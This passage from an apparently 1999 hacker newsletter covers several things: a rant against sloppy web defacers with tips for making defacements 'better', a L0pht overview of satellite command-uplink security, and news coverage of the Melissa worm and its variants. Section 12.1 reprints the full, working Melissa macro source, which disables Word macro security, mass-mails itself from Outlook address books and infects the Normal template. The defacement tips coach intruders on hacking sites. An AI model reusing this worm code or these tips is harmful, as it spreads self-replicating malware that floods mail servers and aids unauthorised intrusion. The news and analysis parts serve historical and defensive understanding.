answer. Because there was no real message worth reading. After taking the power of free speech into their hands, after finding a place to stand on a soapbox, the person stood up only to mumble to a handful of faithful followers that already know the message. And boy, do they love to hear you talk! The rest of the passerby's continue on, unconcerned. They still don't know what you are trying to say. In fact, their opinion of you has gone down because you took the time to get a soapbox, stand on it, and face the public. You flaked out and didn't broadcast a meaningful message, therefore you are worth no time or thought. And there you go, a passing inattention in a fast moving world. Congrats. My Rant in Plain English In the past few years, over one thousand web pages have been hacked. Their content has been replaced with whatever hasty rant has popped into mind by the cracker. With few exceptions, arbitrary low traffic and no name domains are 'chosen' by these crackers to put up their message. Some of these sites get more traffic from the hack than a previous month of regular visitors they are so low key. The truth is, these kids(1) have delusions of grandeur in a networked world that could give a second thought about them. Their message is meaningless drivel that only impresses other kids for the most part. Web viewers walk away from seeing their "message" thinking immature social rejects plague the net, and they think so for damn good reasons. More and more sites are being replaced by poorly designed pages, chock full of mispelled words forming sentences that defy all rules of grammar. Pages full of "elite speak"(2) that prove absolutely nothing, have no humor value, and only contribute to more eye strain. Pages containing poorly written rants that form incoherent thoughts, opinions or reasons as to why the page was altered in the first place. Basically, dull pages that show a complete lack of intelligence and no creativity whatsoever. These kids have a chance to show the world that they are indeed intelligent well balanced *mature* net users, yet they throw every chance away it seems. (1) I use the word kids because more times than not, they ARE kids. Fifteen to Eighteen year olds that don't quite have a concept of how things work. In the cases where they are over eighteen, it is often difficult to tell based on the content of the altered pages. Don't like the use of the word 'kid'? Do a better job hacking these pages. (2) Elite speak being the oh-so-old replacement of alternate characters to spell words. t|-|1s TyP3 0f +3xt. Justification It seems most hackers want/need to justify their actions, be it to the admin of the site they broke into, the people reading the pages, their friends or often times themselves. Regardless of who they are trying to vindicate themselves to, the reasoning falls apart every time. Justification #1: "I'm doing you a favor.. this could have been a malicious hacker that damaged your system!". Gee thanks for breaking in to tell me that. It didn't occur to you that the other 80 MILLION internet users did me a favor by not breaking in? Yet I should thank you? Although these kids rarely do damage, they cause the administrator extra grief in one form or another. Rather than normal work, they are forced into doing a full security audit of their system or reinstalling from scratch. Yes, maybe they should have been more concerned with security before this, but it is a rare site that can dedicate that kind of time or resource to staying up to date on the bleeding edge. That is the way the world works, so deal with it. Oh, and don't try to use that as a justification. Justification #2: "Because we can!" Ok, so if I shoot you in the knee 'just because I can', does that teach you any real lesson? Amazingly enough, this is about the only justification that holds any water. If nothing else, it is the brutally honest truth that the person had nothing better to do, and had no well grounded reason for their actions. Instead of using this as a justification, why not think of a truly noble cause and follow it? Justification #3: "I was pointing out security holes on your site!" Gee, thanks for the free security audit. Not. While you did indeed prove there was a hole, did you mail the administrator telling him HOW you broke in? How to fix it? Did you find more than one way into the system or just the one? If you did none of that, you weren't even close to performing a security audit. Oh, audits require permission too. Bad reason. Justification #4: "Read my political reasons yo!" This one almost works for me, but like the others has serious shortcomings. If your true reason is to impress upon your readers of some political or moral agenda, did you really do it? A good job of it? Did you sit down and research your topic, finding resources and legitimate sources of information to leak to? Did you write up a political rant and place it on an appropriate system? Did you spell check your work to make sure that it flowed reasonably well? Doubtful. Putting up third grade level rants on www.unrelated.com mean just about nothing and truly fail as a justification. Try again. Suggestions For Improving Your Hacked Pages. I am not one to complain about a problem without offering some solution or input to offset the bitching. However, with this comes the chance people will blame me for encouraging hacking and continued defacement of web pages. I do NOT condone any such thing! I am practical and realize that nothing I say will stop people from doing it. That in mind, I am just trying to make the best out of an existing situation. That said... here are my top 10 suggestions for future hacked pages. 1. Better designed pages! Hackers and crackers are said to be creative. You sure wouldn't know it looking at many of these pages. Take your time and DESIGN the web page you are putting up. Make it aesthetically appealing to both lynx and graphical browsers. Why do companies spend all the time on beautiful pages in the first place? 2. Better messages! You are cracking these machines and replacing pages to "get your message out". Err, ok, what is your message? Remember that people are visiting with no prior knowledge of you, your message, or your cause. Be clear and concise and spell out your message for them. 3. No more elite speak crap. If you want to impress people with alternate characters, offer the hacked page in several languages. I for one would love to know what some of the hacked pages in Mexico say, and I would also bet that foreign hackers would love to read American hacks in their tongue. Surely you know someone who can translate to German, French, Latin, Russian or more impressive, Japanese. :) 4. You want to use 'elite' speak? Try grammar, spelling, and puncuation. A well written paragraph will command more respect than any substitute character will. If you mispell common words, how can anyone take you serious? Do you find yourself falling behind in English classes? Use the net to help you! You may find online resources like a dictionary or thesauras an invaluable tool. 5. Help the site! After all, you embarassed them and caused them some kind of hassle. After breaking in and changing their web page, why not temporarily patch the hole/bug in the system that gave you access? Better, patch it and tell what you exploited to get in on the web page. Let other admins learn that these holes are actively being exploited. Link to information on more permanent solutions to their security problem. That is at least half way noble. 6. Back up the main page for them! Rather than overwriting their index.html and relying on them to have a copy, just rename the old one. From your new page, link to the old one and give customers a chance to reach the information they were looking for. They had to read your message to get to it, your job is done. 7. Show knowledge of computers! Creating your hacked web pages with editors like 'FrontPage Express' isn't exactly condusive to propagating the myth that hackers know the system. If you can't write out a basic web page in a simple editor like 'vi', 'pico', or 'DOS edit', you should probably learn HTML before worrying about other people's systems. 8. Target your hacks! Don't change the page of any arbitrary domain you happen to stumble across. Pick a system you feel that needs a face lift and apply it to that system only. 9. Don't actually carry out the mass hack! If you find yours in the position of being able to change pages on multiple domains, don't. Just pick the highest traffic domain, or biggest name and change that one. On your hacked page link to a list of other domains that could have been affected. 10. Choosing a name! Try to be mature when choosing a name. Everyone realizes that some names are quite humorous, but remember who reads these pages. Making a profound statement and backing it by "tHe SiNgAlOnG gAnG!@$#$@" just isn't very cool. The Good, The Bad, and The Impressive. The good, the bad, and the impressive. In the past, there have been pages (more like *elements* of pages) that have stood out as creative, amusing, or to the point. Hopefully by pointing out these examples you will begin to see what I have been attempting to convey. The Good Humor: While it probably wasn't the best site to hit, the recent hack of Greenpeace had a certain dark (and sick) sense of humor behind it. Interesting: Another new person/group to hit the scene recently is 'Redemption'. Their hacks to date have simply contained (apparent) original poetry. A sign of creativity at last! You can read their work from hacks like DaytonTech, Town Green, and TC Edge. Targeted: As suggested above, targeting specific domains in order to spread a specific message is a good thing. Examples of this can be found in Monica Lewinksy's Future Site, White Pride, and Ku Klux Klan. Political: Probably the most memorable and well done hacks was that of the 'Human Rights China' site. When hacking for political agendas, hit the right site, with the right message, and present a well written argument. Does wonders. Don't believe me? Check out the www.humanrights-china.org hack. The Bad Bad: Amnesty International found themselves victim of a web page defacement. Of all the sites on the net, why hit groups that are trying to do good already? Isn't that somewhat defeating? Pathetic: The various hacks for a short period of time carried out by 'zyklon' of LoU. These hacks (many movie home pages) turned out to be one or two lines of broken english followed by a dedication to his girlfriend. *yawn* Kiddies with no creativity. Pathetic: The recent mass hack by the 'Miss Piggy Hackclub', which caused over one hundred domains to display a single line: "The Miss Piggy Hackclub Strikes again muthafuqErz!$##$!@" *yawn* That is almost worth reading. The Impressive None! There hasn't been a truly impressive web page defacement to come along. None that took the cake in site, message, and design. :( by whoever (whoever@attrition.org) (c)opyright 1999 - This piece protected by U.S. copyright and may not be copied without the express written permission of 'whoever@attrition.org' or representing parties of said address. Permission is granted to repost this work in full on any *non-profit* site or mail list. Disclaimer: I do not advocate web defacement. Don't do it. Go learn to program or be creative in better capacities. -EOF @HWA 11.0 Security analysis of Satellite command uplinks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Analysis of Satellite Command and Control Uplinks By Brian Oblivion, L0pht Heavy Industries mailto:oblivion@l0pht.com With every passing day we are becoming aware of the fragile link between technology and modern society. Many critical information paths flow over satellites orbiting our earth. A box floating in space seems to be a likely target for hacker groups or renegade nation-states. As sensational as such a satellite takeover would be, it is highly unlikely. These satellites cost millions of dollars, and an adequate sum of money is devoted to make sure it remains under the control of the intended parties. This document attempts to perform an analysis of security methods used by Government/Military Ground Stations. This information is a summation and review of open-source non-classified information taken from the Internet and other printed sources. Most information is from NASA operations proceedures, however, references from those proceedures influence/are influenced by military SATCOM standard operating proceedures. There are two methods of compromising a satellite by an external threat vector.* One is an attack directly on the Satellite by a rogue Ground Station. The second is an attack on the Master Ground Station (MGS), which houses the command and control (C&C) Uplink, and various access control equipment. An outside attacker may not have all the resourses necessary to attack the C&C uplink such as the eqiupment that encodes the commands and the transmission to the spacecraft. This driving factor makes the assult on the MGS all the more appealing. A great deal of work has been put into securing the C&C Uplink. The spacecraft command processor authenticates every command sent to it. The C&C data is often encrypted and decrypted in the spacecraft. The downlink is often unencrypted, however, in the military arena, this is often encrypted as well. Various transmission modes can be used but in the military/government arena spread spectrum (SS) or frequency hopping (FH) is generally employed using secure spreading or hopping sequences. SS and FH are used due to thier anti-jamming and low probability of intercept characteristics. In the unlikely event a rogue Ground Station actually acquired the sequence to get a command burst to the satellite, the MGS would begin to receive telemetry indicating that a command channel is being accessed. Responses from the satellite to the rogue Ground Station would be received at both locations. The MGS would see a response to a request it did not send and a flag would be raised at which point contingency plans would be set in motion. It would also be very difficult for a rogue Ground Station to supply the proper command sequence field, unless the MGS is being monitored. Highly unlikely in the case of the armchair hacker, point and clicking his way to telecommunications Godhood. By far the path of least resistance is obtaining control through compromising the security of the MGS. While long term control may not be achievable, there is the possibility of spoofing a command message to the uplink operators and having them pass that information to the satellite. Scientific Exploration and commercial satellites usually conform to the CCSDS telecommand frames and the military/government uses something similar. Information on these command frames and command syntax are available through the Internet. A set of checks and balances exist within the MGS. If a command request exceeds pre-defined parameters, the command is flagged and escalated to an authority to determine the nature of the exception. Interception, modification, and re-submission of a command message is of the greatest risk. However, the attacker would require an indepth knowledge of the target system and have knowledge of the normal operational parameters so exceptions would not be flagged, reveling his presence. Once a command is determined valid by the spacecraft command processor, the command is sent back to verify the proper command was indeed received and awaits acknoledgement. Further analysis of the command processor and actual checks performed on the sequence and syntax of commands received are beyond the scope of this document. Due to these checks, one command sending the satellite spiraling out of orbit is just not possible without the addition of catestrophic equipment failure. Remember that satellite position is also tracked by third parties. In the event that a satellite makes a change in course, the MGS of that satellite would be immediately notified. There are other checks in place that monitor the heartbeat of a satellite. Should that satellite move, its associated beam spot would become disturbed resulting in loss or degredation of communications. There are overrides to the normal safeguards for emergency spacecraft commanding. As long as an override provision exists, there is the possibility of the exploitation of that provision. However, the override can only be engaged by onsite MGS personel. Manual overrides are a requirement for every MGS. In the event that the computerized frontend is compromised in some fashion, be it of malicious intent or equipment failure, commands can be relayed to the spacecraft directly from manual command consoles. The nature of Satellite communications often dictates that Ground Stations are not necessarily located in the most convient locations. Quite often they are located in remote regions and/or at sea. This requires a distributed networking architecture as well as interoper- ability definitions. NASA in particular has been moving from its highly proprietary legacy systems to more commercial-off-the shelf (COTS) hardware. One must realize this obscurity once provided additional security to the network. The current trend in commercial security offerings is a reactionary role to security management. Holes remain to be identified until the units are shipped to the end user and often not found until the device is in operation. Some MGS's are known to be connected to live internetworked nets. These nets are often treated as sensitive, yet unclasified, to support interoperability. Security policy governing the nature of the systems which are hosted by the satellites define the security of the MGS network. Where interoperablity is not an issue, without physical access to the MGS, your chances are remote to compromise the system. Institutional security policy sets directives in employing firewalls and restrictive routers. Intrusion detection system may also be employed between closed networks. SecurID, kerberos, and biometric access controls are found throughout the commercial/government/military access controls. Access is usually restricted by IP address. Firewalls and routers have been known to be accidentially misconfigured, and often remain that way for lenghty periods of time due to inadequate penetration testing and security fault analysis. An offline proof-of-concept security prototyping lab is a requirement for integrating a new access control system into the operational environment. A good institutional security policy will require such facilities. Many safeguards have been built into the existing C&C uplinks. Key management systems are classified, as is information on implementation of cryptographic systems used. There may be holes in the implementation, but with the other safeguards, the chances of successfuly undermining the o security mechanisms is slim. One can never under estimate the human factor in these systems. To poke holes in security policy is human. Hopefully this article shed light onto the criteria which may lead to MGS compromise and direct satellite C&C uplink attack. The chances of something along these lines actually happening without new techniques or heretofore unknown methods being employed, is remote, but not impossible. ---------------------------------------------------- * A third attack vector could be an attack from within. Poisoning the flight software on the satellite, or the software used to interact with the satellite, bypassing required security provisions. Code review could diminish this threat. @HWA 12.0 Melissa virus makes it hard for Microsoft users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Bad Girl Melissa Overloads Networks Contributed by Adam IT Managers around the world will wake up Monday morning to overloaded email servers as a new MS Word Macro Virus/Worm spreads across the internet. "Melissa" attacks users of MS Outlook by grabbing up to fifty addresses from an Outlook address book and automatically sends copies of itself as an MS Word attachment to unsuspecting victims. While the virus/worm does not seem to intentionally cause damage the flood of email that it generates is enough to bog down servers essentially causing a major denial of service. Users who do not use Microsoft products will not be effected. Forbes.........http://www.forbes.com/tool/html/99/mar/0326/side1.htm ZD Net.........http://www.zdnet.com/zdnn/stories/news/0,4586,2233030,00.html Info World.....http://www.infoworld.com/cgi-bin/displayStory.pl?990326.wcvirus.htm NY Times.......http://www.nytimes.com/library/tech/99/03/biztech/articles/28virus.html C | Net........http://www.news.com/News/Item/0,4,34334,00.html?st.ne.fd.gif.e Nando Times....http://www.techserver.com/story/body/0,1634,32453-52253-387209-0,00.html The Forbes and Nando Times stories follow; From Forbes http://www.forbes.com/tool/html/99/mar/0326/side1.htm Porn virus hits Corporate America By Adam L. Penenberg with Elizabeth Corcoran number of companies--including Microsoft, Compaq, Intel and Boeing--have been infected by a new computer virus that attacks users of the Microsoft Outlook E-mail program. The virus, dubbed "Melissa," was first cataloged today, March 26, by MacAfee on its web site. The virus is spreading rapidly and, because of its design is jamming E-mail gateways and causing system administrators to shut down. Since the virus was uncorked just before the weekend, when IT staff are away from work, the full extent of the damage may not be known for some time, although it is certain that many more companies--and individuals--will fall victim. If you are listed in someone's Outlook Express address book, and he is infected, then you could be affected--if you open the attached MSWord file. "Getting rid of this will take a long time, because it only takes one message to start it all over again," says Barry Wadman, president of C-Systems, an E-commerce designer. "I venture to say that this will be affecting and or infecting the net for at least a couple of weeks." Intel, according to PR manager Tom Waldrop, has ordered those who have received the virus to shut down their machines. "The IT staff is working hard to make sure that infected machines are cleaned appropriately," he says. "It is certain that many more companies will fall victim." Melissa is a Word Macro Virus that is spread when a user opens an attached Microsoft Word file. Upon activation, it looks for Outlook--Microsoft's E-mail, newsreader and personal information manager--creates a message, and sends it to the first 50 people listed in the user's address book. Each message contains the subject: "Important Message From (Your User Name)." The body of the E-mail simply says, "Here is that document you asked for ... don't show anyone else ;-)" When users click on the attached file, they unleash the virus. The attached file contains a list of 300 porno sites--passed on as if the sender is pointing people to XXX porno sites. It also modifies the normal template in MS Word, infecting every new document that the user creates with Word. The virus is not malevolent, meaning it does not destroy or alter data, or trash hard drives. But it is fiendish because of the intense volume of E-mail it produces, which is causing networks to choke. Only users of Microsoft Outlook are affected by the Melissa virus. Macintosh users and those using other E-mail programs have nothing to worry about. "In the past people have always been told not to open attachments that come from people you do not know," says Space Rogue, publisher of Hacker News Network and a member of L0pht Heavy Industries, a Boston-based hacker think tank. "Well, here is a virus that is sent as an attachment from someone you do know." The Melissa virus seems to be one of the few with a utiltarian purpose. Since the virus spreads so quickly, it "would definitely be a great spam vehicle," says Dildog, another member of Lopht. Most spam points recipients at porn sites and get-rich-quick scams. That typical spam is easily traced back to its source, since the spammer usually includes a web site, phone number or E-mail address. But the Melissa virus, by automatically spewing out a list of 300 sites, makes tracing the creator extremely difficult. Comments inside the virus include: 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! The best way to stop the virus? Be suspicious of mail with attachments and the subject line: "Important Message From (Your User Name)" From Nando Times; http://www.techserver.com/story/body/0,1634,32453-52253-387209-0,00.html 'Melissa' virus hits Internet Copyright © 1999 Nando Media Copyright © 1999 Reuters News Service By DICK SATRAN SAN FRANCISCO (March 28, 1999 4:34 p.m. EST http://www.nandotimes.com) - A virus that spreads via e-mail hit computers over the weekend and threatened havoc Monday as workers return to offices and begin opening messages sent over the Internet. The virus, called "Melissa," comes in the form of a document that lists pornography sites on the World Wide Web. Computer experts said the virus was aimed at widely used Microsoft Windows-based e-mail address book software, Outlook and Outlook Express, and it can send up to 50 additional versions of the e-mail to other users, threatening a widespread infection of computer systems. That could create a flood of unwanted e-mails around the Internet as the program perpetuates itself using pre-programmed "macros," software embedded in the Windows operating system that sets off complex computer functions with one command. "It could grow explosively and shut down e-mail systems as a side effect," Eric Allman, co-founder of the Emeryville, Calif.-based Sendmail, a widely used provider of e-mail services, said in an interview Sunday. A number of leading software security firms and academic experts posted warnings about the e-mail threat, including Network Associates, the leading anti-virus software maker. "Melissa is widely reported and spreading quickly via mass e-mail, a function of the viral infection," said Network Associates based in Santa Clara, Calif. Carnegie Mellon University's Software Engineering Institute issued an advisory, which said, "The number and variety of reports we have received indicate that this is a widespread attack affecting a variety of sites." The only damage the virus causes is that it replicates itself and creates a flood of e-mail, though it apparently does not hurt the computer itself, experts said. The real danger is that the virus will overwhelm the server computers that handle computer messaging systems, which could lead to system shutdowns as each e-mail multiplies itself 50 times. Already, a wave of the e-mails has been sent out and awaits office workers Monday morning. "It's not doing malicious things or removing files or anything like that," Allman said. "I've heard claims that it has been doing more but I haven't seen any substantial verification of that. It's really more of a wake-up call, that shows us how you could take a malicious virulent virus and reproduce it all over the place very quickly." Computer experts warned users to be wary of documents sent from any senders asking them to open up a file for Microsoft Word. That file, in turn, asks for a prompt asking users whether they want to initiate a "macro," and requires users to approve its use. Those checkoffs make it relatively easy to avoid the problem. Microsoft itself has simply warned users to "be careful about what runs on their machine," the New York Times reported. Carnegie Mellon said, "our analysis indicates that human action (in the form of a user opening an infected Word document) is required for this virus to activate." The virus can be identified, Network Associates said, because it will read "Important Message From Application.UserName." The body of the text reads "Here is that document you asked for ... don't show anyone else" and contains a list of pornographic Web sites. Melissa creates the following entry in the registry: HKEYCURRENTUSER/Software/Microsoft/Office/"Melissa?" Network Security said that to avoid the risk of contracting the Melissa virus, "it is recommended that network administrators and users upgrade their anti-virus software to include detection and cleaning for W97M/Melissa." Network Security posted information about the virus on its the Web site of its Avert Labs division, Sendmail also posted advice on the Melissa problem at http:/www.sendmail.com and Carnegie Mellon posted information on its Web site as well. Computer experts said that if advisories were followed, the problem would probably not become a widespread worry. "I suspect we'll see a day or two of extremely high e-mail loads and then it will just die out, so in some sense this virus is not that critical but it's one what demonstrates what could happen if a truly malicious virus were released," Sendmail's Allman said. "The ability to spread something so broadly is scary." FBI, experts search for elusive author of 'Melissa' virus March 30, 1999 Web posted at: 10:47 p.m. EST (0347 GMT) http://www.cnn.com/TECH/computing/9903/30/virus.tracker/index.html WASHINGTON (CNN) -- Several mutations of the computer virus known as Melissa surfaced Tuesday, although experts said they were not as effective as the original in clogging e-mail systems. The FBI has launched an investigation into the fast-spreading virus, which first appeared last Friday and spread rapidly around the world by Monday. The agency estimated that the virus has affected "thousands of computer users" at more than 100 companies and government agencies. "I urge e-mail users to exercise caution when reading their e-mail for the next few days and to bring unusual messages to the attention of their system administrator," said Michael A, Vatis, director of the FBI's National Infrastructure Protection Center (NIPC). NIPC is a multiagency unit focusing on threats to the nation's infrastructure, including computers and telephone, electric and water systems. The Melissa virus spreads via Microsoft's widely used Word 97 and Word 2000 documents which can be attached to e-mail messages. The Melissa virus comes in the form of e-mail, usually containing the subject line "Important Message." It appears to be from a friend or colleague. The body of the e-mail message says, "Here is that document you asked for ... don't show it to anyone else" with a winking smiley face formed by the punctuation marks ;-). Attached to the message is a Microsoft's Word document file that lists Internet pornography sites. Once the user opens that file, the virus digs into the user's Microsoft's Outlook address book and sends infected documents to the first 50 addresses. Computer sleuth tracks down virus source As the virus swamped one computer system after another over the weekend, software developer Richard Smith followed a trail of electronic fingerprints left by Melissa. "This electronic fingerprint is basically the serial number of your computer. So what I was curious about is whether it would be possible to use the serial number in the Melissa document ... to track down the author," said Smith, who runs Phar Lap Software, a small Cambridge, Massachusetts, software firm that makes operating systems and software tools. Smith posted his "digital fingerprinting" theory on an Internet discussion group Friday. He received an e-mail from a college student in Sweden who pointed out similarities between Melissa and older viruses written by a computer user known as "VicodinES." Smith was familiar with other work attributed to the notorious VicodinES, named after the painkiller drug Vicoden. The same user had posted so-called "virus creation tool kits" on the Web. "In about 30 percent of those files, I found that same fingerprint number, the same serial number that was in the Melissa virus ... at a minimum, we know that the Melissa virus and these tool kits were created on the same computer," Smith said. Threat remains Smith said he turned his findings over to the FBI, who regard the transmission of the virus as a criminal matter. But the biggest impact of the Melissa virus appeared to be the temporary shutdown of massive computer systems by cautious managers. Computer giants Microsoft and Intel were among those who received copies of the tainted note, as did Lucent Technologies, the world's largest communications equipment maker. And although anti-virus software programs have so far been successful in containing Melissa, experts fear its variants will be corrected and distributed by copycat virus writers. Indeed, a potentially more damaging virus code-named "Papa" emerged on Monday. The new virus is a more elaborate program that uses the same e-mail system as Melissa. Correspondent Marsha Walton, The Associated Press and Reuters contributed to this report. @HWA 12.1 The Melissa macro virus code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 26 Mar 1999 17:05:51 -0800 From: Aleph One To: BUGTRAQ@netspace.org Subject: Melissa Macro Virus I normally don't allow virus posts through the list as they seldom represent a new threat, just a new example of an already existing one, but this one is getting enough play to warrant a message. There is a new Word macro virus circulating called Melissa. The virus propagates via email. Attached to the email is a Word file that when opened will launch a macro that will send the same message to the first 50 recipients of your Outlook address book. The subject line is "important Message From ". The body consist of the text "Here is that document you asked for... don't show anyone else;-)". The infected documents contains passwords to porn web sites. For more information check out: http://vil.mcafee.com/vil/vm10120.asp As this thing is emailing itself to everyone under the sun virus vendors should have no problem obtaining copies to analyze. If anyone wants a copy send me a message. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 ---------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 18:01:13 -0800 From: Nate Lawson To: BUGTRAQ@netspace.org Subject: Melissa virus code Sorry to add one more message to this. I placed the code up on my site, formatted so that it is readable. http://www.root.org/ -Nate [http://www.root.org/melissa_virus.txt] from: http://www.root.org/melissa_virus.txt Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub 12.2 PAPA, a new Melissa variant targets specific individual sites with ping flood attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ New Virus Launches Mini Infowar http://www.internetnews.com/bus-news/article/0,1087,3_89541,00.html March 30, 1999 By Brian McWilliams InternetNews.com Correspondent Business News Archives A new macro virus based on the infamous Melissa has been released into the wild, and it may be the latest phase in an infowar between hackers and a security consultant. According to virus experts, the so-called Papa virus is transmitted in the same manner as Melissa, sending copies of itself to addresses in a victim's Microsoft Outlook address book. But while Melissa seemed designed to snarl up computer networks everywhere, Papa targets a specific person, Fred Cohen, a security consultant in Livermore, Calif. The virus, which is transmitted by e-mail in a Microsoft Excel file named path.xls, attempts to launch a ping flood on Cohen's web site at all.net, as well as on the IP address of Cohen's connection to the @Home Network cable Internet access service. Cohen was among the first in the security community to publicize information about Caligula, a macro virus capable of stealing a victim's PGP private keyring. PGP is a popular encryption software package. In a posting to a security mailing list last month, Cohen called on the Internet community to attack the web site of the Codebreakers, a virus writer's group to which Caligula's author belongs. Cohen Tuesday confirmed the Papa virus is some sort of retaliation for his actions. But Cohen said there's been collateral damage to innocent Internet users, including severe performance degradation to the @Home Network. "It's not an eye for an eye. They're causing damage to the infrastructure and inconvenience to people who get the virus. If they pester me, I don't care and nobody else cares. But if they take down the infrastructure, they'll go to jail." @Home Network representatives were not available to confirm whether the attack on Cohen's IP address has impacted performance of the network. Many antivirus software vendors have already released updates to detect and clean Papa. Keith Peer, president of Central Command, distributor of AntiViral ToolKit Pro said Papa is already spreading fast. His firm is receiving dozens of reports every hour. @HWA 12.2 PAPA B and MadCow Joke virii variants already becoming widespread as copycats modify the Melissa code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yet another variant of the nasty Melissa virus has surfaced on the Internet, this one with the subject line "Mad cow joke." Story The new mad cow joke virus is unrelated to other so-called Mad Cow viruses that have surfaced in the past, according to anti-virus company Trend Micro Inc. The new virus is similar to Melissa in that it surfaces when users open a Word document attached to an e-mail, triggering e-mail to the top entries in an Outlook user's address book. Unlike Melissa, which sends out 50 messages, this one sends out only 20. Also, it is a member of a group of viruses known as "class viruses," which store code in a different -- and harder-to-detect -- portion of a Word document. 'I think it's going to show up affecting people,' -- Dan Schrader, Trend Micro The virus comes with a subject line "Mad cow joke," a body containing the words "beware of the speed of the Mad cow," and an attached file called madcow.doc. The virus' creator even tipped his or her hat to Melissa. The last lines of code in the Mad cow virus read: "word/veronicathankstoword/melissaandword/class." Trend Micro hasn't heard from anybody who's seen the virus in action, but officials there believe they will shortly. "I think it's going to show up affecting people," said Dan Schrader, Trend Micro's product manager. More variations coming Schrader believes a host of variant viruses will surface in the wake of Melissa. "We're going to see a lot of them," Schrader said. "It's unfortunate these guys need to copycat." Most anti-virus firms have updated their software to ward off variants. "When viruses become popular, other hackers use them as a roadmap," said, Sal Viveros, group marketing manager for Network Associate Inc.'s (Nasdaq:NETA) anti-virus products.

Because those roadmaps in the variants are similar to the original virus, most anti-virus software can detect and exterminate them. Only a few get through Most viruses created never reach actual users. Of the 35,000 to 40,000 viruses created by both researchers and malicious hackers, only 200 to 300 ever pass through innocent users' computers, according to Symantec Corp. (Nasdaq: SYMC), another anti-virus firm.

